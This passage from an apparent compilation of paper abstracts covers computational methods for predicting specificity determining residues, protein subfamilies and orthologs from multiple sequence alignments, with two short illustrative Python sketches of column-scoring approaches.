Results: We propose a new approach, SPEL (specificity positions by evolutionary likelihood), to detect positions that are likely to be functional specificity determinants. SPEL, which does not require subgroup definition, takes a multiple sequence alignment of a protein family as the only input, and assigns a P-value to every position in the alignment. Positions with low P-values are likely to be important for functional specificity. An evolutionary tree is reconstructed during the calculation, and P-value estimation is based on a random model that involves evolutionary simulations. Evolutionary log-likelihood is chosen as a measure of amino acid distribution at a position. To illustrate the performance of the method, we carried out a detailed analysis of two protein families (LacI/PurR and G protein α subunit), and compared our method with two existing methods (evolutionary trace and mutual information based). All three methods were also compared on a set of protein families with known ligand-bound structures. Availability: SPEL is freely available for non-commercial use. Its pre-compiled versions for several platforms and alignments used in this work are available at ftp://iole.swmed.edu/pub/SPEL/ Contact: [email protected]. Supplementary information: Supplementary materials are available at ftp://iole.swmed.edu/pub/SPEL/ --- paper_title: SPEER-SERVER: a web server for prediction of protein specificity determining sites paper_content: Sites that show specific conservation patterns within subsets of proteins in a protein family are likely to be involved in the development of functional specificity. These sites, generally termed specificity determining sites (SDS), might play a crucial role in binding to a specific substrate or proteins. Identification of SDS through experimental techniques is a slow, difficult and tedious job. Hence, it is very important to develop efficient computational methods that can more expediently identify SDS. Herein, we present Specificity prediction using amino acids’ Properties, Entropy and Evolution Rate (SPEER)-SERVER, a web server that predicts SDS by analyzing quantitative measures of the conservation patterns of protein sites based on their physico-chemical properties and the heterogeneity of evolutionary changes between and within the protein subfamilies. This web server provides an improved representation of results, adds useful input and output options and integrates a wide range of analysis and data visualization tools when compared with the original standalone version of the SPEER algorithm. Extensive benchmarking finds that SPEER-SERVER exhibits sensitivity and precision performance that, on average, meets or exceeds that of other currently available methods. SPEER-SERVER is available at http://www.hpppi.iicb.res.in/ss/. --- paper_title: Protein interactions and ligand binding: From protein subfamilies to functional specificity paper_content: The divergence accumulated during the evolution of protein families translates into their internal organization as subfamilies, and it is directly reflected in the characteristic patterns of differentially conserved residues. These specifically conserved positions in protein subfamilies are known as "specificity determining positions" (SDPs). Previous studies have limited their analysis to the study of the relationship between these positions and ligand-binding specificity, demonstrating significant yet limited predictive capacity.
We have systematically extended this observation to include the role of differential protein interactions in the segregation of protein subfamilies and explored in detail the structural distribution of SDPs at protein interfaces. Our results show the extensive influence of protein interactions in the evolution of protein families and the widespread association of SDPs with protein interfaces. The combined analysis of SDPs in interfaces and ligand-binding sites provides a more complete picture of the organization of protein families, constituting the necessary framework for a large scale analysis of the evolution of protein function. --- paper_title: Large-Scale Prediction of Function Shift in Protein Families with a Focus on Enzymatic Function paper_content: Protein function shift can be predicted from sequence comparisons, either using positive selection signals or evolutionary rate estimation. None of the methods have been validated on large datasets, however. Here we investigate existing and novel methods for protein function shift prediction, and benchmark the accuracy against a large dataset of proteins with known enzymatic functions. Function change was predicted between subfamilies by identifying two kinds of sites in a multiple sequence alignment: Conservation-Shifting Sites (CSS), which are conserved in two subfamilies using two different amino acid types, and Rate-Shifting Sites (RSS), which have different evolutionary rates in two subfamilies. CSS were predicted by a new entropy-based method, and RSS using the Rate-Shift program. In principle, the more CSS and RSS between two subfamilies, the more likely a function shift between them. A test dataset was built by extracting subfamilies from Pfam with different EC numbers that belong to the same domain family. Subfamilies were generated automatically using a phylogenetic tree-based program, BETE. The dataset comprised 997 subfamily pairs with four or more members per subfamily. We observed a significant increase in CSS and RSS for subfamily comparisons with different EC numbers compared to cases with same EC numbers. The discrimination was better using RSS than CSS, and was more pronounced for larger families. Combining RSS and CSS by discriminant analysis improved classification accuracy to 71%. The method was applied to the Pfam database and the results are available at http://FunShift.cgb.ki.se. A closer examination of some superfamily comparisons showed that single EC numbers sometimes embody distinct functional classes. Hence, the measured accuracy of function shift is underestimated. --- paper_title: Prediction of enzyme function based on 3D templates of evolutionarily important amino acids paper_content: Background: Structural genomics projects such as the Protein Structure Initiative (PSI) yield many new structures, but often these have no known molecular functions. One approach to recover this information is to use 3D templates – structure-function motifs that consist of a few functionally critical amino acids and may suggest functional similarity when geometrically matched to other structures. Since experimentally determined functional sites are not common enough to define 3D templates on a large scale, this work tests a computational strategy to select relevant residues for 3D templates. --- paper_title: Using evolutionary information to find specificity-determining and co-evolving residues.
paper_content: Intricate networks of protein interactions rely on the ability of a protein to recognize its targets: other proteins, ligands, and sites on DNA and RNA. To recognize other molecules, it was suggested that a protein uses a small set of specificity-determining residues (SDRs). How can one find these residues in proteins and distinguish them from other functionally important amino acids? A number of bioinformatics methods to predict SDRs have been developed in recent years. These methods use genomic information and multiple sequence alignments to identify positions exhibiting a specific pattern of conservation and variability. The challenge is to delineate the evolutionary pattern of SDRs from that of the active site residues and the residues responsible for formation of the protein's structure. The phylogenetic history of a protein family makes such analysis particularly hard. Here we present two methods for finding the SDRs and the co-evolving residues (CERs) in proteins. We use a Monte Carlo approach for statistical inference, allowing us to reveal specific evolutionary patterns of SDRs and CERs. We apply these methods to study specific recognition in the bacterial two-component system and in the class Ia aminoacyl-tRNA synthetases. Our results agree well with structural information and the experimental analyses of these systems. Our results point at the complex and distinct patterns characteristic of the evolution of specificity in these systems. --- paper_title: An automated stochastic approach to the identification of the protein specificity determinants and functional subfamilies paper_content: Background: Recent progress in sequencing and 3D structure determination techniques stimulated development of approaches aimed at more precise annotation of proteins, that is, prediction of exact specificity to a ligand or, more broadly, to a binding partner of any kind. Results: We present a method, SDPclust, for identification of protein functional subfamilies coupled with prediction of specificity-determining positions (SDPs). SDPclust predicts specificity in a phylogeny-independent stochastic manner, which allows for the correct identification of the specificity for proteins that are separated on a phylogenetic tree, but still bind the same ligand. SDPclust is implemented as a Web-server http://bioinf.fbb.msu.ru/SDPfoxWeb/ and a stand-alone Java application available from the website. Conclusions: SDPclust performs a simultaneous identification of specificity determinants and specificity groups in a statistically robust and phylogeny-independent manner. --- paper_title: Bayesian search of functionally divergent protein subgroups and their function specific residues paper_content: Motivation: The rapid increase in the amount of protein sequence data has created a need for an automated identification of evolutionarily related subgroups from large datasets. The existing methods typically require a priori specification of the number of putative groups, which defines the resolution of the classification solution. Results: We introduce a Bayesian model-based approach to simultaneous identification of evolutionary groups and conserved parts of the protein sequences. The model-based approach provides an intuitive and efficient way of determining the number of groups from the sequence data, in contrast to the ad hoc methods often exploited for similar purposes. Our model recognizes the areas in the sequences that are relevant for the clustering and regards other areas as noise.
We have implemented the method using a fast stochastic optimization algorithm which yields a clustering associated with the estimated maximum posterior probability. The method has been shown to have high specificity and sensitivity in simulated and real clustering tasks. With real datasets the method also highlights the residues close to the active site. Availability: Software 'kPax' is available at http://www.rni.helsinki.fi/jic/softa.html Contact: [email protected] Supplementary information: http://www.rni.helsinki.fi/~jic/softa.html --- paper_title: Predicting specificity-determining residues in two large eukaryotic transcription factor families paper_content: Certain amino acid residues in a protein, when mutated, change the protein's function. We present an improved method of finding these specificity-determining positions that uses all the protein sequence data available for a family of homologous proteins. We study in detail two families of eukaryotic transcription factors, basic leucine zippers and nuclear receptors, because of the large amount of sequences and experimental data available. These protein families also have a clear definition of functional specificity: DNA-binding specificity. We compare our results to three other methods, including the evolutionary trace algorithm and a method that depends on orthology relationships. All of the predictions are compared to the available mutational and crystallographic data. We find that our method provides superior predictions of the known specificity-determining residues and also predicts residue positions within these families that deserve further study for their roles in functional specificity. --- paper_title: Automatic methods for predicting functionally important residues paper_content: Sequence analysis is often the first guide for the prediction of residues in a protein family that may have functional significance. A few methods have been proposed which use the division of protein families into subfamilies in the search for those positions that could have some functional significance for the whole family, but at the same time which exhibit the specificity of each subfamily ("Tree-determinant residues"). However, there are still many unsolved questions like the best division of a protein family into subfamilies, or the accurate detection of sequence variation patterns characteristic of different subfamilies. Here we present a systematic study in a significant number of protein families, testing the statistical meaning of the Tree-determinant residues predicted by three different methods that represent the range of available approaches. The first method takes as a starting point a phylogenetic representation of a protein family and, following the principle of Relative Entropy from Information Theory, automatically searches for the optimal division of the family into subfamilies. The second method looks for positions whose mutational behavior is reminiscent of the mutational behavior of the full-length proteins, by directly comparing the corresponding distance matrices. The third method is an automation of the analysis of distribution of sequences and amino acid positions in the corresponding multidimensional spaces using a vector-based principal component analysis. These three methods have been tested on two non-redundant lists of protein families: one composed by proteins that bind a variety of ligand groups, and the other composed by proteins with annotated functionally relevant sites.
In most cases, the residues predicted by the three methods show a clear tendency to be close to bound ligands of biological relevance and to those amino acids described as participants in key aspects of protein function. These three automatic methods provide a wide range of possibilities for biologists to analyze their families of interest, in a similar way to the one presented here for the family of proteins related with ras-p21. --- paper_title: Predicting functional divergence in protein evolution by site-specific rate shifts. paper_content: Most modern tools that analyze protein evolution allow individual sites to mutate at constant rates over the history of the protein family. However, Walter Fitch observed in the 1970s that, if a protein changes its function, the mutability of individual sites might also change. This observation is captured in the "non-homogeneous gamma model", which extracts functional information from gene families by examining the different rates at which individual sites evolve. This model has recently been coupled with structural and molecular biology to identify sites that are likely to be involved in changing function within the gene family. Applying this to multiple gene families highlights the widespread divergence of functional behavior among proteins to generate paralogs and orthologs. --- paper_title: Supervised multivariate analysis of sequence groups to identify specificity determining residues paper_content: Background: Proteins that evolve from a common ancestor can change functionality over time, and it is important to be able to identify residues that cause this change. In this paper we show how a supervised multivariate statistical method, Between Group Analysis (BGA), can be used to identify these residues from families of proteins with different substrate specificities using multiple sequence alignments. Results: We demonstrate the usefulness of this method on three different test cases. Two of these test cases, the Lactate/Malate dehydrogenase family and Nucleotidyl Cyclases, consist of two functional groups. The other family, Serine Proteases, consists of three groups. BGA was used to analyse and visualise these three families using two different encoding schemes for the amino acids. Conclusion: This overall combination of methods in this paper is powerful and flexible while being computationally very fast and simple. BGA is especially useful because it can be used to analyse any number of functional classes. In the examples we used in this paper, we have only used 2 or 3 classes for demonstration purposes but any number can be used and visualised. --- paper_title: OrthoMCL: identification of ortholog groups for eukaryotic genomes. paper_content: The identification of orthologous groups is useful for genome annotation, studies on gene/protein evolution, comparative genomics, and the identification of taxonomically restricted sequences. Methods successfully exploited for prokaryotic genome analysis have proved difficult to apply to eukaryotes, however, as larger genomes may contain multiple paralogous genes, and sequence information is often incomplete. OrthoMCL provides a scalable method for constructing orthologous groups across multiple eukaryotic taxa, using a Markov Cluster algorithm to group (putative) orthologs and paralogs. This method performs similarly to the INPARANOID algorithm when applied to two genomes, but can be extended to cluster orthologs from multiple species.
OrthoMCL clusters are coherent with groups identified by EGO, but improved recognition of "recent" paralogs permits overlapping EGO groups representing the same gene to be merged. Comparison with previously assigned EC annotations suggests a high degree of reliability, implying utility for automated eukaryotic genome annotation. OrthoMCL has been applied to the proteome data set from seven publicly available genomes (human, fly, worm, yeast, Arabidopsis, the malaria parasite Plasmodium falciparum, and Escherichia coli). A Web interface allows queries based on individual genes or user-defined phylogenetic patterns (http://www.cbil.upenn.edu/gene-family). Analysis of clusters incorporating P. falciparum genes identifies numerous enzymes that were incompletely annotated in first-pass annotation of the parasite genome. --- paper_title: ConSurf: an algorithmic tool for the identification of functional regions in proteins by surface mapping of phylogenetic information paper_content: Experimental approaches for the identification of functionally important regions on the surface of a protein involve mutagenesis, in which exposed residues are replaced one after another while the change in binding to other proteins or changes in activity are recorded. However, practical considerations limit the use of these methods to small-scale studies, precluding a full mapping of all the functionally important residues on the surface of a protein. We present here an alternative approach involving the use of evolutionary data in the form of multiple-sequence alignment for a protein family to identify hot spots and surface patches that are likely to be in contact with other proteins, domains, peptides, DNA, RNA or ligands. The underlying assumption in this approach is that key residues that are important for binding should be conserved throughout evolution, just like residues that are crucial for maintaining the protein fold, i.e. buried residues. A main limitation in the implementation of this approach is that the sequence space of a protein family may be unevenly sampled, e.g. mammals may be overly represented. Thus, a seemingly conserved position in the alignment may reflect a taxonomically uneven sampling, rather than being indicative of structural or functional importance. To avoid this problem, we present here a novel methodology based on evolutionary relations among proteins as revealed by inferred phylogenetic trees, and demonstrate its capabilities for mapping binding sites in SH2 and PTB signaling domains. A computer program that implements these ideas is available freely at: http://ashtoret.tau.ac.il/~rony --- paper_title: Functional specificity lies within the properties and evolutionary changes of amino acids. paper_content: The rapid increase in the amount of protein sequence data has created a need for automated identification of sites that determine functional specificity among related subfamilies of proteins. A significant fraction of subfamily specific sites are only marginally conserved, which makes it extremely challenging to detect those amino acid changes that lead to functional diversification. To address this critical problem we developed a method named SPEER (specificity prediction using amino acids' properties, entropy and evolution rate) to distinguish specificity determining sites from others. SPEER encodes the conservation patterns of amino acid types using their physico-chemical properties and the heterogeneity of evolutionary changes between and within the subfamilies.
To test the method, we compiled a test set containing 13 protein families with known specificity determining sites. Extensive benchmarking by comparing the performance of SPEER with other specificity site prediction algorithms has shown that it performs better in predicting several categories of subfamily specific sites. --- paper_title: RIO: Analyzing proteomes by automated phylogenomics using resampled inference of orthologs paper_content: Background: When analyzing protein sequences using sequence similarity searches, orthologous sequences (that diverged by speciation) are more reliable predictors of a new protein's function than paralogous sequences (that diverged by gene duplication). The utility of phylogenetic information in high-throughput genome annotation ("phylogenomics") is widely recognized, but existing approaches are either manual or not explicitly based on phylogenetic trees. Results: Here we present RIO (Resampled Inference of Orthologs), a procedure for automated phylogenomics using explicit phylogenetic inference. RIO analyses are performed over bootstrap resampled phylogenetic trees to estimate the reliability of orthology assignments. We also introduce supplementary concepts that are helpful for functional inference. RIO has been implemented as a Perl pipeline connecting several C and Java programs. It is available at http://www.genetics.wustl.edu/eddy/forester/. A web server is at http://www.rio.wustl.edu/. RIO was tested on the Arabidopsis thaliana and Caenorhabditis elegans proteomes. Conclusion: The RIO procedure is particularly useful for the automated detection of first representatives of novel protein subfamilies. We also describe how some orthologies can be misleading for functional inference. --- paper_title: Automated Protein Subfamily Identification and Classification paper_content: Function prediction by homology is widely used to provide preliminary functional annotations for genes for which experimental evidence of function is unavailable or limited. This approach has been shown to be prone to systematic error, including percolation of annotation errors through sequence databases. Phylogenomic analysis avoids these errors in function prediction but has been difficult to automate for high-throughput application. To address this limitation, we present a computationally efficient pipeline for phylogenomic classification of proteins. This pipeline uses the SCI-PHY (Subfamily Classification in Phylogenomics) algorithm for automatic subfamily identification, followed by subfamily hidden Markov model (HMM) construction. A simple and computationally efficient scoring scheme using family and subfamily HMMs enables classification of novel sequences to protein families and subfamilies. Sequences representing entirely novel subfamilies are differentiated from those that can be classified to subfamilies in the input training set using logistic regression. Subfamily HMM parameters are estimated using an information-sharing protocol, enabling subfamilies containing even a single sequence to benefit from conservation patterns defining the family as a whole or in related subfamilies. SCI-PHY subfamilies correspond closely to functional subtypes defined by experts and to conserved clades found by phylogenetic analysis. Extensive comparisons of subfamily and family HMM performances show that subfamily HMMs dramatically improve the separation between homologous and non-homologous proteins in sequence database searches.
Subfamily HMMs also provide extremely high specificity of classification and can be used to predict entirely novel subtypes. The SCI-PHY Web server at http://phylogenomics.berkeley.edu/SCI-PHY/ allows users to upload a multiple sequence alignment for subfamily identification and subfamily HMM construction. Biologists wishing to provide their own subfamily definitions can do so. Source code is available on the Web page. The Berkeley Phylogenomics Group PhyloFacts resource contains pre-calculated subfamily predictions and subfamily HMMs for more than 40,000 protein families and domains at http://phylogenomics.berkeley.edu/phylofacts/. --- paper_title: Clustering of proximal sequence space for the identification of protein families paper_content: Motivation: The study of sequence space, and the deciphering of the structure of protein families and subfamilies, has up to now been required for work in comparative genomics and for the prediction of protein function. With the emergence of structural proteomics projects, it is becoming increasingly important to be able to select protein targets for structural studies that will appropriately cover the space of protein sequences, functions and genomic distribution. These problems are the motivation for the development of methods for clustering protein sequences and building families of potentially orthologous sequences, such as those proposed here. Results: First we developed a clustering strategy (Ncut algorithm) capable of forming groups of related sequences by assessing their pairwise relationships. The results presented for the ras super-family of proteins are similar to those produced by other clustering methods, but without the need for clustering the full sequence space. The Ncut clusters are then used as the input to a process of reconstruction of groups with equilibrated genomic composition formed by closely-related sequences. The results of applying this technique to the data set used in the construction of the COG database are very similar to those derived by the human experts responsible for this database. Availability: The analysis of different systems, including the COG equivalent 21 genomes are available at http://www.pdg.cnb.uam.es/GenoClustering.html Contact: [email protected] --- paper_title: Characterization and prediction of residues determining protein functional specificity paper_content: Motivation: Within a homologous protein family, proteins may be grouped into subtypes that share specific functions that are not common to the entire family. Often, the amino acids present in a small number of sequence positions determine each protein's particular functional specificity. Knowledge of these specificity determining positions (SDPs) aids in protein function prediction, drug design and experimental analysis. A number of sequence-based computational methods have been introduced for identifying SDPs; however, their further development and evaluation have been hindered by the limited number of known experimentally determined SDPs. Results: We combine several bioinformatics resources to automate a process, typically undertaken manually, to build a dataset of SDPs. The resulting large dataset, which consists of SDPs in enzymes, enables us to characterize SDPs in terms of their physicochemical and evolutionary properties. It also facilitates the large-scale evaluation of sequence-based SDP prediction methods.
We present a simple sequence-based SDP prediction method, GroupSim, and show that, surprisingly, it is competitive with a representative set of current methods. We also describe ConsWin, a heuristic that considers sequence conservation of neighboring amino acids, and demonstrate that it improves the performance of all methods tested on our large dataset of enzyme SDPs. Availability: Datasets and GroupSim code are available online at http://compbio.cs.princeton.edu/specificity/ Contact: [email protected] Supplementary information: Supplementary data are available at Bioinformatics online. --- paper_title: Automated structure-based prediction of functional sites in proteins: applications to assessing the validity of inheriting protein function from homology in genome annotation and to protein docking. paper_content: A major problem in genome annotation is whether it is valid to transfer the function from a characterised protein to a homologue of unknown activity. Here, we show that one can employ a strategy that uses a structure-based prediction of protein functional sites to assess the reliability of functional inheritance. We have automated and benchmarked a method based on the evolutionary trace approach. Using a multiple sequence alignment, we identified invariant polar residues, which were then mapped onto the protein structure. Spatial clusters of these invariant residues formed the predicted functional site. For 68 of 86 proteins examined, the method yielded information about the observed functional site. This algorithm for functional site prediction was then used to assess the validity of transferring the function between homologues. This procedure was tested on 18 pairs of homologous proteins with unrelated function and 70 pairs of proteins with related function, and was shown to be 94% accurate. This automated method could be linked to schemes for genome annotation. Finally, we examined the use of functional site prediction in protein-protein and protein-DNA docking. The use of predicted functional sites was shown to filter putative docked complexes with a discrimination similar to that obtained by manually including biological information about active sites or DNA-binding residues. --- paper_title: Secator: A Program for Inferring Protein Subfamilies from Phylogenetic Trees paper_content: With the huge increase of protein data, an important problem is to estimate, within a large protein family, the number of sensible subsets for subsequent in-depth structural, functional, and evolutionary analyses. To tackle this problem, we developed a new program, Secator, which implements the principle of an ascending hierarchical method using a distance matrix based on a multiple alignment of protein sequences. Dissimilarity values assigned to the nodes of a deduced phylogenetic tree are partitioned by a new stopping rule introduced to automatically determine the significant dissimilarity values. The quality of the clusters obtained by Secator is verified by a separate Jackknife study. The method is demonstrated on 24 large protein families covering a wide spectrum of structural and sequence conservation and its usefulness and accuracy with real biological data is illustrated on two well-studied protein families (the Sm proteins and the nuclear receptors).
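The SDP predictors described in the preceding entries (for example GroupSim and SDPpred-style approaches) share a common core idea: a column is interesting when each predefined subgroup is internally conserved but the subgroups prefer different residues. As a hedged illustration only, the sketch below scores columns by the Jensen-Shannon divergence between the smoothed amino-acid distributions of two subgroups; the function names, pseudocount value and toy data are assumptions of this example, not part of any cited method.

```python
import math
from collections import Counter

AA = "ACDEFGHIKLMNPQRSTVWY"

def column_distribution(column, pseudocount=0.5):
    """Smoothed amino-acid frequency distribution for one alignment column."""
    counts = Counter(aa for aa in column.upper() if aa in AA)
    total = sum(counts.values()) + pseudocount * len(AA)
    return {aa: (counts.get(aa, 0) + pseudocount) / total for aa in AA}

def jensen_shannon(p, q):
    """Jensen-Shannon divergence (bits) between two amino-acid distributions."""
    m = {aa: 0.5 * (p[aa] + q[aa]) for aa in AA}
    def kl(a, b):
        return sum(a[aa] * math.log2(a[aa] / b[aa]) for aa in AA)
    return 0.5 * kl(p, m) + 0.5 * kl(q, m)

def sdp_scores(alignment, labels):
    """Rank columns by divergence between the two subgroups given in `labels`;
    high-scoring columns are candidate specificity determining positions."""
    group_a = [seq for seq, lab in zip(alignment, labels) if lab == "A"]
    group_b = [seq for seq, lab in zip(alignment, labels) if lab == "B"]
    scores = []
    for col in range(len(alignment[0])):
        p = column_distribution("".join(s[col] for s in group_a))
        q = column_distribution("".join(s[col] for s in group_b))
        scores.append(jensen_shannon(p, q))
    return scores

# Toy example: the third column separates subgroup A (D) from subgroup B (K).
alignment = ["MADLV", "MADIV", "MAKLV", "MAKIV"]
labels = ["A", "A", "B", "B"]
print(sdp_scores(alignment, labels))
```

The cited methods add refinements on top of such a subgroup contrast, for example physico-chemical property encodings, evolutionary rates or windowed conservation, as in the ConsWin heuristic mentioned above.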
--- paper_title: Multi-RELIEF: a method to recognize specificity determining residues from multiple sequence alignments using a Machine-Learning approach for feature weighting paper_content: Motivation: Identification of residues that account for protein function specificity is crucial, not only for understanding the nature of functional specificity, but also for protein engineering experiments aimed at switching the specificity of an enzyme, regulator or transporter. Available algorithms generally use multiple sequence alignments to identify residue positions conserved within subfamilies but divergent in between. However, many biological examples show a much subtler picture than simple intra-group conservation versus inter-group divergence. Results: We present multi-RELIEF, a novel approach for identifying specificity residues that is based on RELIEF, a state-of-the-art Machine-Learning technique for feature weighting. It estimates the expected ‘local’ functional specificity of residues from an alignment divided in multiple classes. Optionally, 3D structure information is exploited by increasing the weight of residues that have high-weight neighbors. Using ROC curves over a large body of experimental reference data, we show that (a) multi-RELIEF identifies specificity residues for the seven test sets used, (b) incorporating structural information improves prediction for specificity of interaction with small molecules and (c) comparison of multi-RELIEF with four other state-of-the-art algorithms indicates its robustness and best overall performance. Availability: A web-server implementation of multi-RELIEF is available at www.ibi.vu.nl/programs/multirelief. Matlab source code of the algorithm and data sets are available on request for academic use. Contact: [email protected] Supplementary information: Supplementary data are available at Bioinformatics online --- paper_title: Multi-Harmony: detecting functional specificity from sequence alignment paper_content: Many protein families contain sub-families with functional specialization, such as binding different ligands or being involved in different protein-protein interactions. A small number of amino acids generally determine functional specificity. The identification of these residues can aid the understanding of protein function and help finding targets for experimental analysis. Here, we present multi-Harmony, an interactive web server for detecting sub-type-specific sites in proteins starting from a multiple sequence alignment. Combining our Sequence Harmony (SH) and multi-Relief (mR) methods in one web server allows simultaneous analysis and comparison of specificity residues; furthermore, both methods have been significantly improved and extended. SH has been extended to cope with more than two sub-groups. mR has been changed from a sampling implementation to a deterministic one, making it more consistent and user friendly. For both methods Z-scores are reported. The multi-Harmony web server produces a dynamic output page, which includes interactive connections to the Jalview and Jmol applets, thereby allowing interactive analysis of the results. Multi-Harmony is available at http://www.ibi.vu.nl/programs/shmrwww.
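Multi-RELIEF, described in the entry above, adapts the RELIEF feature-weighting scheme to alignment columns. To make that idea concrete, here is a minimal RELIEF-style weighting sketch for an alignment with class labels; it is a simplified illustration on assumed toy data, not the published multi-RELIEF algorithm, which handles multiple classes, moved from a sampling to a deterministic implementation, and can add structure-based weighting.

```python
def hamming(a, b):
    """Number of alignment columns at which two equal-length sequences differ."""
    return sum(x != y for x, y in zip(a, b))

def relief_weights(alignment, labels, passes=1):
    """Minimal RELIEF-style weighting of alignment columns.

    For each sequence, the nearest neighbour of the same class (hit) and of a
    different class (miss) are located; a column's weight is decreased when it
    differs from the hit and increased when it differs from the miss, so
    high-weight columns are those that track the class labels."""
    n_cols = len(alignment[0])
    weights = [0.0] * n_cols
    for _ in range(passes):
        for i, seq in enumerate(alignment):
            hits = [s for j, s in enumerate(alignment)
                    if j != i and labels[j] == labels[i]]
            misses = [s for j, s in enumerate(alignment) if labels[j] != labels[i]]
            near_hit = min(hits, key=lambda s: hamming(seq, s))
            near_miss = min(misses, key=lambda s: hamming(seq, s))
            for c in range(n_cols):
                weights[c] -= (seq[c] != near_hit[c]) / len(alignment)
                weights[c] += (seq[c] != near_miss[c]) / len(alignment)
    return weights

# Toy example: only the third column follows the class labels.
alignment = ["MADLV", "MADIV", "MAKLV", "MAKIV"]
labels = ["A", "A", "B", "B"]
print(relief_weights(alignment, labels))
```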
--- paper_title: BADASP: predicting functional specificity in protein families using ancestral sequences paper_content: Summary: Burst After Duplication with Ancestral Sequence Predictions (BADASP) is a software package for identifying sites that may confer subfamily-specific biological functions in protein families following functional divergence of duplicated proteins. A given protein phylogeny is grouped into subfamilies based on orthology/paralogy relationships and/or user definitions. Ancestral sequences are then predicted from the sequence alignment and the functional specificity is calculated using variants of the Burst After Duplication method, which tests for radical amino acid substitutions following gene duplications that are subsequently conserved. Statistics are output along with subfamily groupings and ancestral sequences for an easy analysis with other packages. Availability: BADASP is freely available from http://www.bioinformatics.rcsi.ie/~redwards/badasp/ Contact: [email protected] Supplementary information: A manual with further details can be downloaded from http://www.bioinformatics.rcsi.ie/~redwards/badasp/ --- paper_title: Classification of protein families and detection of the determinant residues with an improved self-organizing map paper_content: Using a SOM (self-organizing map) we can classify sequences within a protein family into subgroups that generally correspond to biological subcategories. These maps tend to show sequence similarity as proximity in the map. Combining maps generated at different levels of resolution, the structure of relations in protein families can be captured that could not otherwise be represented in a single map. The underlying representation of maps enables us to retrieve characteristic sequence patterns for individual subgroups of sequences. Such patterns tend to correspond to functionally important regions. We present a modified SOM algorithm that includes a convergence test that dynamically controls the learning parameters to adapt them to the learning set instead of being fixed and externally optimized by trial and error. Given the variability of protein family size and distribution, the addition of this feature is necessary. The method is successfully tested with a number of families. The rab family of small GTPases is used to illustrate the performance of the method. --- paper_title: INTREPID: a web server for prediction of functionally important residues by evolutionary analysis paper_content: We present the INTREPID web server for predicting functionally important residues in proteins. INTREPID has been shown to boost the recall and precision of catalytic residue prediction over other sequence-based methods and can be used to identify other types of functional residues. The web server takes an input protein sequence, gathers homologs, constructs a multiple sequence alignment and phylogenetic tree and finally runs the INTREPID method to assign a score to each position. Residues predicted to be functionally important are displayed on homologous 3D structures (where available), highlighting spatial patterns of conservation at various significance thresholds. The INTREPID web server is available at http://phylogenomics.berkeley.edu/intrepid. --- paper_title: Phylogeny-independent detection of functional residues paper_content: Motivation: Current projects for the massive characterization of proteomes are generating protein sequences and structures with unknown function.
The difficulty of experimentally determining functionally important sites calls for the development of computational methods. The first techniques, based on the search for fully conserved positions in multiple sequence alignments (MSAs), were followed by methods for locating family-dependent conserved positions. These rely on the functional classification implicit in the alignment for locating these positions related with functional specificity. The next obvious step, still scarcely explored, is to detect these positions using a functional classification different from the one implicit in the sequence relationships between the proteins. Here, we present two new methods for locating functional positions which can incorporate an arbitrary external functional classification which may or may not coincide with the one implicit in the MSA. The Xdet method is able to use a functional classification with an associated hierarchy or similarity between functions to locate positions related to that classification. The MCdet method uses multivariate statistical analysis to locate positions responsible for each one of the functions within a multifunctional family. Results: We applied the methods to different cases, illustrating scenarios where there is a disagreement between the functional and the phylogenetic relationships, and demonstrated their usefulness for the phylogeny-independent prediction of functional positions. Availability: All computer programs and datasets used in this work are available from the authors for academic use. Contact: [email protected] Supplementary information: Supplementary data are available at http://pdg.cnb.uam.es/pazos/Xdet_MCdet_Add/ --- paper_title: The contrasting properties of conservation and correlated phylogeny in protein functional residue prediction paper_content: Background: Amino acids responsible for structure, core function or specificity may be inferred from multiple protein sequence alignments where a limited set of residue types are tolerated. The rise in available protein sequences continues to increase the power of techniques based on this principle. Results: A new algorithm, SMERFS, for predicting protein functional sites from multiple sequence alignments was compared to 14 conservation measures and to the MINER algorithm. Validation was performed on an automatically generated dataset of 1457 families derived from the protein interactions database SNAPPI-DB, and a smaller manually curated set of 148 families. The best performing measure overall was Williamson property entropy, with ROC0.1 scores of 0.0087 and 0.0114 for domain and small molecule contact prediction, respectively. The Lancet method performed worse than random on protein-protein interaction site prediction (ROC0.1 score of 0.0008). The SMERFS algorithm gave similar accuracy to the phylogenetic tree-based MINER algorithm but was superior to Williamson in prediction of non-catalytic transient complex interfaces. SMERFS predicts sites that are significantly more solvent accessible compared to Williamson. Conclusion: Williamson property entropy is the best performing of 14 conservation measures examined. The difference in performance of SMERFS relative to Williamson in manually defined complexes was dependent on complex type. The best choice of analysis method is therefore dependent on the system of interest. Additional computation employed by Miner in calculation of phylogenetic trees did not produce improved results over SMERFS.
SMERFS performance was improved by use of windows over alignment columns, illustrating the necessity of considering the local environment of positions when assessing their functional significance. --- paper_title: Determinants of protein function revealed by combinatorial entropy optimization paper_content: We use a new algorithm (combinatorial entropy optimization [CEO]) to identify specificity residues and functional subfamilies in sets of proteins related by evolution. Specificity residues are conserved within a subfamily but differ between subfamilies, and they typically encode functional diversity. We obtain good agreement between predicted specificity residues and experimentally known functional residues in protein interfaces. Such predicted functional determinants are useful for interpreting the functional consequences of mutations in natural evolution and disease. --- paper_title: Automated ortholog inference from phylogenetic trees and calculation of orthology reliability paper_content: Motivation: Orthologous proteins in different species are likely to have similar biochemical function and biological role. When annotating a newly sequenced genome by sequence homology, the most precise and reliable functional information can thus be derived from orthologs in other species. A standard method of finding orthologs is to compare the sequence tree with the species tree. However, since the topology of the phylogenetic tree is not always reliable one might get incorrect assignments. Results: Here we present a novel method that resolves this problem by analyzing a set of bootstrap trees instead of the optimal tree. The frequency of orthology assignments in the bootstrap trees can be interpreted as a support value for the possible orthology of the sequences. Our method is efficient enough to analyze data in the scale of whole genomes. It is implemented in Java and calculates orthology support levels for all pairwise combinations of homologous sequences of two species. The method was tested on simulated datasets and on real data of homologous proteins. Availability: Downloadable free of charge from ftp://ftp.cgb.ki.se/pub/prog/orthostrapper/ or on request from the authors. --- paper_title: Automatic clustering of orthologs and in-paralogs from pairwise species comparisons paper_content: Orthologs are genes in different species that originate from a single gene in the last common ancestor of these species. Such genes have often retained identical biological roles in the present-day organisms. It is hence important to identify orthologs for transferring functional information between genes in different organisms with a high degree of reliability. For example, orthologs of human proteins are often functionally characterized in model organisms. Unfortunately, orthology analysis between human and e.g. invertebrates is often complex because of large numbers of paralogs within protein families. Paralogs that predate the species split, which we call out-paralogs, can easily be confused with true orthologs. Paralogs that arose after the species split, which we call in-paralogs, however, are bona fide orthologs by definition. Orthologs and in-paralogs are typically detected with phylogenetic methods, but these are slow and difficult to automate. Automatic clustering methods based on two-way best genome-wide matches on the other hand, have so far not separated in-paralogs from out-paralogs effectively. We present a fully 